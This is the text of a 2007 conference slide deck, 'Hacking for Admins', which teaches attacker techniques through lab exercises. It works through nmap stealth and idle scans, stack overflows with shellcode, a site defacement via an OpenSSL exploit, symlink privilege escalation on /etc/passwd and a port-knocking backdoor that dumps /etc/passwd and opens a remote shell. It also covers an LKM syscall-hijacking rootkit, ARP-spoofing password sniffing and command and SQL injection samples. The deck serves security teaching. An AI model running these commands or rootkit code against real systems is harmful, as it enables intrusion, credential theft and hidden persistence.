  • 22. Scanning -- Goals -- ➤ mapping of the target network ➤ use system tools like traceroute & ping ➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route ➤ finding the range of IP addresses ➤ discerning the subnet mask ➤ identify network devices like firewalls & routers ➤ identify servers ➤ mapping of the reachable services ➤ detecting `live` hosts on target network ➤ discovering services / listening ports / portscan; nmap; ➤ identifying operating system & services ➤ identify application behind services & patch level 01./02.02.2007 linuxdays.lu 2007 22
  • 23. Scanning -- Network Mapping -- Nmap: find living hosts $ su – # ns_mumm # cat /etc/resolve.conf # nmap –sL www.mumm.lu/27 # List Scan (only do nslookup for the IP rage) # nmap –-packet_trace –sP www.mumm.lu/27 # ICMP/TCP (send ICMP Echo Request and ACK to Port 80 if RST is received  host is alive / unfiltered ) # nmap –n –P0 –sU –g 53 –p 53 –T polite www.mumm.lu/27 ( UDP Scans are alomost NOT usefully; -g 53 = sourceport -P0 = don’t PingScan first; -T polite = scan speed) -sF, -sX, -sN, –sA, # not usable FIN-, XMAS-, Null-, ACK- Scan # today 01./02.02.2007 linuxdays.lu 2007 23
  • 24. Scanning -- Port Scanning -- Nmap: port scan (connect scan) # nmap –n –sT –P0 –p 80 192.168.22.21,22,24 # nmap –n –sT –P0 –p 110 192.168.22.21,22,24 SYN Port open SYN/ACK ACK RST/ACK Port closed SYN RST/ACK 01./02.02.2007 linuxdays.lu 2007 24
  • 25. Scanning -- Port Scanning -- Nmap: port scan (stealth scan) # nmap –n –sS –P0 –p 80 192.168.22.21,22,24 # nmap –n –sS –P0 –p 110 192.168.22.21,22,24 SYN Port open SYN/ACK RST Port closed SYN RST/ACK 01./02.02.2007 linuxdays.lu 2007 25
  • 26. Scanning -- Port Scanning -- Nmap: port scan # nmap –n –sT –P0 –p 20-25,80,443 192.168.22.21,22,24 # nmap –n –sS –P0 –p 20-25,80,443 192.168.22.21,22,24 Techniques to stay anonymous: silent scan: # nmap –n –sT –P0 –T sneaky –p 20-25,80 192.168.22.22 fragmentation scan # nmap –n –P0 –f –p 20-25,80 192.168.22.22 decoy scan # nmap –n -P0 –D 1.1.1.1,2.2.2.2,ME,3.3.3.3 –p 80 <host> 01./02.02.2007 linuxdays.lu 2007 26
  • 27. Scanning -- Exercise -- Scan the MUMM.LU network: 01./02.02.2007 linuxdays.lu 2007 27
  • 28. Advanced Scanning -- IP-ID Idle Scan -- Exercise: Who the hell is scanning you? target perform: # tcpdump –n –i eth0 host 192.168.4.<your IP Address> attacker perform: (idle_scan) 01./02.02.2007 linuxdays.lu 2007 28
  • 29. Advanced Scanning -- IP-ID Idle Scan -- - based on IP-ID prediction - example with hping2 –SA –p 80 –c 5 <switch ip> - all packets have Fragment-ID Number - every new packet increases the IP ID Number - by most systems IP ID + 1 - this is exploitable - by monitoring the IP ID value of a host - you know how many packets he sends - this could be abused for zombie port scanning 01./02.02.2007 linuxdays.lu 2007 29
  • 30. Advanced Scanning -- IP-ID Idle Scan -- Step 1: A) send SYN/ACK to Zombie B) investigate the answer IPID C) repeate A) and B) multiple times, verify quality of Zombie IP-ID Probe -> SYN/ACK Response -> RST; IPID=2 IP-ID Probe -> SYN/ACK Response -> RST; IPID=3 IP-ID Probe -> SYN/ACK Zombie Response -> RST; IPID=4 IP-ID Probe -> SYN/ACK Response -> RST; IPID=5 01./02.02.2007 linuxdays.lu 2007 30
  • 31. Advanced Scanning -- IP-ID Idle Scan -- Step 2: A) Send SYN to target BUT spoof the Source IP Adress, claim to be the Zombie B) open port: Target send SYN/ACK to Zombie C) open port: Zombie send RST and increase IPID to Target Zombie SYN; Port=80; C K N/A SRC IP = <zombie> SY ID= 6 IP RST; Target 01./02.02.2007 linuxdays.lu 2007 31
  • 32. Advanced Scanning -- IP-ID Idle Scan -- Step 2: A) Send SYN to target BUT spoof the Source IP Adress, claim to be the Zombie B) close port: Target simply send a RST to the Zombie Zombie SYN; Port=80; T RS SRC IP = <zombie> Target 01./02.02.2007 linuxdays.lu 2007 32
  • 33. Advanced Scanning -- IP-ID Idle Scan -- Step 3: A) send SYN/ACK to Zombie B) investigate the answer IPID If IPID = 6  port was close If IPID = 7  port was open IP-ID Probe -> SYN/ACK Response -> RST; IPID=7 Zombie 01./02.02.2007 linuxdays.lu 2007 33
  • 34. Advanced Scanning -- IP-ID Idle Scan -- IP ID Idle Scan with nmap # nmap –n –P0 –p20-25,80,443 –sI <zombie> <target> # nmap –n –P0 –p20-25,80,443 –sI 10.10.10.10 10.10.11.11 01./02.02.2007 linuxdays.lu 2007 34
  • 35. Scanning -- Identifying Services -- Banner Grabbing & Version Mapping: - What services are bound to the port: -- identifying service / protocoll; -- identifying Server-Software; -- identifying Version Number; -- identifying additional Modules etc. automatic approach # nmap –n –p 20-25,80,443 –sV 192.168.22.22,25 # nmap –n –p 20-25,80,443 –oM scan1 192.168.22.22,25 # amap –B –i scan1 # amap –i scan1 01./02.02.2007 linuxdays.lu 2007 35
  • 36. Scanning -- Identifying Services -- Banner Grabbing & Version Mapping: manual approach with Netcat # nc 192.168.22.22 22 # nc 192.168.22.22 80 HEAD / HTTP/1.0 # nc 192.168.22.21 21 # nc 192.168.22.21 80 HEAD / HTTP/1.0 OS Detection # nmap –O 192.168.22.22,25 # xprobe2 192.168.22.22 # xprobe2 –p tcp:443:open 192.168.22.22 01./02.02.2007 linuxdays.lu 2007 36
  • 37. Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 37
  • 38. Gaining Access -- Where are we now -- At this point we know (without doing something illegal at all): -- Targets business (products, partners, emplyees) -- overview of the network topology -- overview of live servers and open ports -- services in use, server-software, version numbers How to proceed: -- is there a known vulnerability -- do we know a vulnerability -- known configuration problems -- default passwords prepare attack -- research on internet for known security holes -- default passwords; common misconfigurations -- setup a test environment to practice the attack -- ideal: fire one single attack 01./02.02.2007 linuxdays.lu 2007 38
  • 39. Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 39
  • 40. Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 40
  • 41. Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 41
  • 42. Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 42
  • 43. Gaining Access -- Buffer Overflow -- ➤ Stack Based Buffer Overflows ➤ Off-by-One Overflows ➤ Frame Pointer Overwrites ➤ BSS Overflows ➤ Heap Overflows 01./02.02.2007 linuxdays.lu 2007 43
  • 44. Gaining Access -- Stack Based Buffer Overflow -- ➤ C/C++ problem ➤ programming error ➤ Copy to much variable user input into fixed sized buffer #include <stdio.h> int main() { char name[31]; printf("Please type your name: "); gets(name); printf("Hello, %s", name); return 0; } Buffer overflow occur if you enter `1234567890123456789012345678901234567890` 01./02.02.2007 linuxdays.lu 2007 44
  • 45. Gaining Access -- Stack Based Buffer Overflow -- Exploitation: -- Missing bounds checking -- Mutiple „unsafe“ functions in libc -- Executing code in the data/stack segment -- Creating the to be feed to the application Memory layout of a process: high address Stack LIFO – top of the stack Heap no ‘execution’ attribute set BSS Data ‘read-only’ attribute Code low address 01./02.02.2007 linuxdays.lu 2007 45
  • 46. Gaining Access -- Stack Based Buffer Overflow -- - function parameters -- Stack holding all the information for the function - local variables -- Stack is created at the beginning of a function - data to recover previous frame -- Stack is released at the end of a function Stack -- LIFO mechanism to pass arguments to functions and to reference local variables Frame 1 void function (void) { [ ... ] } Frame 2 EBP int POP main (void) { ESP int a; PUSH function (argv[1]) [ ... ] EIP: Extended Instruction Pointer } EBP: Extended Base Pointer ESP: Extended Stack Pointer 01./02.02.2007 linuxdays.lu 2007 46
  • 47. Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; args strcpy (buff, args); Return Address EIP main () } SFP Frame 1 saved registers int local variables 1 main (int argc, char *argv[]) args { Return Address EIP if (argc > 1) SFP EBP function () saved registers { Frame 2 2 function (argv[1]); local variables } else printf ("no inputn"); buff[512] ESP return 0; } EIP: Extended Instruction Pointer EBP: Extended Base Pointer ESP: Extended Stack Pointer 01./02.02.2007 linuxdays.lu 2007 47
  • 48. Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; args 5 strcpy (buff, args); main () Return Address } EBP Frame 1 saved registers int local variables 1 main (int argc, char *argv[]) args { Wrong Return if (argc > 1) SFP function () saved registers { Frame 2 2 function (argv[1]); } else buff[512] printf ("no inputn"); return 0; } 01./02.02.2007 linuxdays.lu 2007 48
  • 49. Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; args 5 strcpy (buff, args); main () Return Address 6 } EBP Frame 1 saved registers int local variables 1 main (int argc, char *argv[]) args { Wrong Return if (argc > 1) SFP function () saved registers { Frame 2 2 function (argv[1]); } else buff[512] printf ("no inputn"); return 0; } 01./02.02.2007 linuxdays.lu 2007 49
  • 50. Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; 5 strcpy (buff, args); main () 6 } Frame 1 int 1 main (int argc, char *argv[]) 0x0A00 { 0x0A00 if (argc > 1) 0x0A00 function () 0x0A00 { Frame 2 function (argv[1]); shellcode 2 shellcode 0x0C00 } else nop 0x0A00 printf ("no inputn"); nop 0x0800 return 0; } 01./02.02.2007 linuxdays.lu 2007 50
  • 51. Gaining Access -- Shellcode -- char linux_ia32_shellcode[]= "x31xc0" /* xorl %eax,%eax */ "x50" /* pushl %eax */ "x68""//sh" /* pushl $0x68732f2f */ "x68""/bin" /* pushl $0x6e69622f */ "x89xe3" /* movl %esp,%ebx */ "x50" /* pushl %eax */ "x53" /* pushl %ebx */ "x89xe1" /* movl %esp,%ecx */ "x99" /* cdql */ "xb0x0b" /* movb $0x0b,%a1 */ "xcdx80" /* int $0x80 */ Old school payload: bindshell, backconnect 01./02.02.2007 linuxdays.lu 2007 51
  • 52. Gaining Access -- Exercise: Web Site defacement -- $ cd /home/hamm/ssl/ $ ls –la $ ./openSSL 0x73 192.168.22.21 443 –c 40 /usr/bin/whoami echo "hacked by me….. " > /var/www/html/index.html - Unprivileged user -> local user privileges escalation 01./02.02.2007 linuxdays.lu 2007 52
  • 53. Gaining Access -- Exercise: Web Site defacement -- What do we see on the Firewall??? 01./02.02.2007 linuxdays.lu 2007 53
  • 54. Gaining Access primary target webserver -- why they are so vulnerable -- ➤ complex application ➤ multiple subsystems: application server, scripts, sql-server ➤ self made applications: programmers don’t know how to write secure code ➤ Shell-Command-Injection: bypass commands through the shell Input: "Alice; rm - rf" ➤ SQL-Injection bypass SQL Commands by User input Input: "User=Alice' -&Pass=Idontknow" 01./02.02.2007 linuxdays.lu 2007 54
  • 55. Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 55
  • 56. Maintaining Access -- be silent -- ➤ after a successful initial attack ➤ hide the tracks from logfiles ➤ expand local rights; find vulnerabilities in network ➤ install rootkits, steal password database, start network sniffer ➤ try same password on other systems ➤ find problems in topology (ex. dual homed hosts) ➤ try to attack the private network 01./02.02.2007 linuxdays.lu 2007 56
  • 57. Maintaining Access Privileges Escalation -- Race Condition -- what could I try to attack? - SUID / SGID binaries find / -perm –4000 –type f –user root –print find / -perm –2000 –type f –group root –print - privileged process - Kernel - password file Source of problems? - configuration error - local software vulnerabilities -- buffer overflow -- race condition -- format string 01./02.02.2007 linuxdays.lu 2007 57
  • 58. Maintaining Access Privileges Escalation -- example: race_bug -- #include <stdio.h> #include <unistd.h> int main (int argc, char *argv[]) { char path[] = "/tmp/race.txt" FILE *fp; fp = fopen (path, "a+"); fprintf (fp, "%sn", argv[1]); fclose (fp); unlink (path); return 0; } 01./02.02.2007 linuxdays.lu 2007 58
  • 59. Maintaining Access Privileges Escalation -- example: race_bug -- Prepare attack $ cd /home/hamm/race $ ls –la $ ./race_bug test $ ls –la /tmp $ cat /etc/passwd $ su -; cp /etc/passwd /etc/passwd.bak; exit Attak: $ ln –s /etc/passwd /tmp/race.txt $ ls –la /tmp $ cat command $ ./command $ ls –la /tmp $ cat /etc/passwd $ su – bimbam # id 01./02.02.2007 linuxdays.lu 2007 59
  • 60. Maintaining Access Privileges Escalation -- Exercise: privileges escalation -- $ su – # cd /home/hamm/ssl/ # ls –la # cp p /tftpboot # /etc/init.d/atftpd start # exit $ ./openSSL 0x73 192.168.22.21 443 –c 40 /usr/bin/whoami pwd /usr/bin/tftp 192.168.22.1 mode binary # local root exploit get p # kernel 2.2.x 2.4.x quit ls –l chmod +x p ls –l ./p whoami 01./02.02.2007 linuxdays.lu 2007 60
  • 61. Maintaining Access Port Knocking -- introduction -- Aka Port Knocking Back Door - Open Port????? - no promisc mode, no open ports - raw sockets - trigger for special packets to get activated - attacker: -- send trigger pkg1 -- send trigger pkg2 -- send trigger pkg3 -- send command pkg1 Port 80, 443 open; statefull - example: Sadoor http://cmn.listptojects.darklab.org 01./02.02.2007 linuxdays.lu 2007 61
  • 62. Maintaining Access Port Knocking -- Sadoor example -- Sadoor daemon configuration: /etc/sadoor/sadoor.pkts # key 1 keypkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; icmp { type = 8; } } } # key 2 keypkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; tcp { flags = SYN; dport = 80; sport = 3456; } } } 01./02.02.2007 linuxdays.lu 2007 62
  • 63. Maintaining Access Port Knocking -- Sadoor example -- Sadoor daemon configuration: /etc/sadoor/sadoor.pkts # key 3 keypkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; udp { dport = 111; data { bimx20bam } } } } # command cmdpkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; tcp { sport = 80; sport = 12345; } } } 01./02.02.2007 linuxdays.lu 2007 63
  • 64. Maintaining Access Port Knocking -- Sadoor example -- Create a config-image database and download it to /home/hamm/.sash mksadb mv sadoor.db /var/www/html/ chmod 644 /var/www/html/sadoor.db Run the daemon /usr/sbin/sadoor Review logging tail –f /etc/sadoor/sadoor.log 01./02.02.2007 linuxdays.lu 2007 64
  • 65. Maintaining Access Port Knocking -- Sadoor example -- ON CLIENT side: 1. Download http://testwww.mumm.lu/sadoor.db 2. become root cd cd .sash mv /home/hamm/sadoor.db . sadbcat sadoor.db sash.db # create encrypted db rm –f sadoor.db # delete plain sequence 3. Sending commands sash 192.168.22.24 –vv –r "cat /etc/passwd > /var/www/html/test.txt" sash 192.168.22.24 "chmod 644 /var/www/html/test.txt" 4. Establish a connection / remote shell sash 192.168.22.24 –vv sh-2.05b# whoami sh-2.05b# /sbin/ifconfig sh-2.05b# exit 01./02.02.2007 linuxdays.lu 2007 65
  • 66. Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 66
  • 67. Clearing Tracks Rootkits -- introduction -- Main goals of a rootkit: - hide activities of an attacker to the legal administrator -- active processes -- directories & files -- network activities - provide a backdoor to the system - let the attacker become root whenever he want - collect sensitive data -- from network -- from user input 01./02.02.2007 linuxdays.lu 2007 67
  • 68. Clearing Tracks Rootkits -- introduction -- 1th generation: Binary Rootkits - replace important system tools by modified versions: -- du(1), locate(1), netstat(1), ps(1), top(1), -- ifconfig(1), w(1), who(1), ….. - defined parameters will become invisible in the future: -- IP Addresses -- directories & files -- usernames - easy to discover: -- by filesystem inegrity checker: -- tripwire, -- aide - examples: Irk3-6, (Linux), Fbrk (FreeBSD), Solaris Rootkit 01./02.02.2007 linuxdays.lu 2007 68
  • 69. Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - expand the functionality of the kernel - can be loaded dynamically: insmod(3), rmmod(3) - implemented as device driver -> high level of flexibility - implementations: -- new modules -- infecting existing modules - result: trojaned kernel  full control over all userland apps. 01./02.02.2007 linuxdays.lu 2007 69
  • 70. Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - syscalls: a gate between userland and kernel - example for syscalls: trace /bin/ls execve(… uname(… brk(0) old_mmap(… access(… open(… open(… … … 01./02.02.2007 linuxdays.lu 2007 70
  • 71. Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - normal syscall: parameter into int 80 registers Userland Kernel selection of the Interrupt handler: Exec syscall interrupt handler syscall selection example: mkdir Interrupt Descriptor Table Syscall Table (IDT) 01./02.02.2007 linuxdays.lu 2007 71
  • 72. Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - manipulated syscall: parameter into int 80 registers Userland Kernel selection of the Interrupt handler: Exec syscall interrupt handler syscall selection Exec syscall example: mkdir manipluated: mkdir Interrupt Descriptor Table Syscall Table (IDT) 01./02.02.2007 linuxdays.lu 2007 72
  • 73. Clearing Tracks Rootkits -- introduction -- 2th generation: LKM Rootkit: Exercise: mkdir_Rootkit #define MODULE /* the new mkdir syscall */ #define __KERNEL__ int hack_mkdir (const char *path) { printk ("BimBam!n"); #include <linux/module.h> return 0; #include <linux/version.h> } #include <linux/kernel.h> #include <sys/syscall.h> int init_module (void) { #include <stdio.h> orig_mkdir=sys_call_table[SYS_mkdir]; sys_call_table[SYS_mkdir]=hack_mkdir; MODULE_LICENSE("GPL"); return 0; } /* import syscall table */ extern void *sys_call_table[]; void cleanup_module (void) { sys_call_table[SYS_mkdir]=hack_mkdir; /* dummy for old mkdir syscall */ } int (*orig_mkdir) (const char *path); 01./02.02.2007 linuxdays.lu 2007 73
  • 74. Clearing Tracks Rootkits -- introduction -- 2th generation: LKM Rootkit: Exercise: mkdir_Rootkit cd /root/rootkit/mkdir gcc –c –I /usr/src/linux/include mkdir.c insmod mkdir.o lsmod mkdir test ls –la cat /var/log/messages rmmod mkdir lsmod mkdir test ls –la 01./02.02.2007 linuxdays.lu 2007 74
  • 75. Clearing Tracks Rootkits -- introduction -- 2th generation: LKM Rootkit: Adore cd /root/rootkit/adore/ insmod adore.o lsmod insmod cleaner.o lsmod rmmod cleaner lsmod ps aux | grep ssh ./ava i <PID SSHD> ps aux | grep ssh netstat –punta | grep 22 mkdir /root/rootkit/bimbam ./ava h /root/rootkit/bimbam ls –la /root/rootkit ./ava –U dummy 01./02.02.2007 linuxdays.lu 2007 75
  • 76. Clearing Tracks Rootkits -- introduction -- 3th generation: (Virtual File System) VFS Layer Rootkit - sys_call_table is not exported anymore -- Red Hat 8.0 (Kernel 2.4.18) -- Kernel 2.5.41  - all Syscalls which access the Filesystem make use of the Virtual File System - in Unix, most of all is handled like a file - existing Handler-Routines are replaced by modified one  files/folder could be hidden  via /proc hidding of processes 01./02.02.2007 linuxdays.lu 2007 76
  • 77. Clearing Tracks Rootkits -- introduction -- 3th generation: (Virtual File System) VFS Layer Rootkit parameter into int 80 registers Userland Kernel selection of the Interrupt handler: Syscall interrupt handler syscall selection VFS ext2/ ext3/ ... Interrupt Descriptor Table Syscall Table (IDT) 01./02.02.2007 linuxdays.lu 2007 77
  • 78. Hacking Techniques Insider Attacks 01./02.02.2007 linuxdays.lu 2007 78
  • 79. Insider Attacks -- Password Sniffing true a Switch -- Default Gateway Attacked PC IP: 10.10.10.1 IP: 10.10.10.2 MAC: 11:11:11:11:11:11 MAC: 22:22:22:22:22:22 ARP Reply IP 10.10.10.1 MAC 99:99:99:99:99:99 No gratuitous ARP, BUT directed ARP: ETHERNET II Dst: 22:22:22:22:22:22 IP: 10.10.10.99 SRC: 99:99:99:99:99:99 MAC: 99:99:99:99:99:99 ARP reply: Sender IP addr: 10.10.10.1 Sender MAC addr: 99:99:99:99:99:99 01./02.02.2007 linuxdays.lu 2007 79
  • 80. Insider Attacks -- Password Sniffing true a Switch -- Exercise: 1. echo 1 > /proc/sys/net/ipv4/ip_forward 2. arpspoof –i eth0 –t 192.168.4.30 192.168.4.28 3. dsniff -cn Telnet Client: Telnet Server: IP: 192.168.3.3 IP: 192.168.3.4 IP: ___.___.___.___ IP: ___.___.___.___ Attacker: IP: 192.168.3.2 MAC: 00:08:74:B3:BB:F1 IP: ___.___.___.___ MAC: __:__:__:__:__:__ 01./02.02.2007 linuxdays.lu 2007 80
  • 81. Insider Attacks SSH MitM Attack -- by DNS Spoofing -- SSH Server: IP: 192.168.3.3 DNS Query (HOST: server_xyz.lu) Target: SSH Client: IP: 192.168.3.xx Default Gateway: IP: 192.168.3.1 DNS Server: IP: 158.64.4. Attacker: IP: 192.168.3.2 DNS Response (server_xyz.lu, 192.168.3.2) 01./02.02.2007 linuxdays.lu 2007 81
  • 82. Insider Attacks SSH MitM Attack -- by DNS Spoofing -- 01./02.02.2007 linuxdays.lu 2007 82
  • 83. Insider Attacks SSH MitM Attack -- by DNS Spoofing -- SSH Server: IP: 192.168.3.3 Target: SSH Client: IP: 192.168.3.xx Default Gateway: IP: 192.168.3.1 DNS Server: IP: 158.64.4. Attacker: IP: 192.168.3.2 01./02.02.2007 linuxdays.lu 2007 83
  • 84. Hacking for Admins by Michael Hamm 01./02.02.2007 linuxdays.lu 2007 84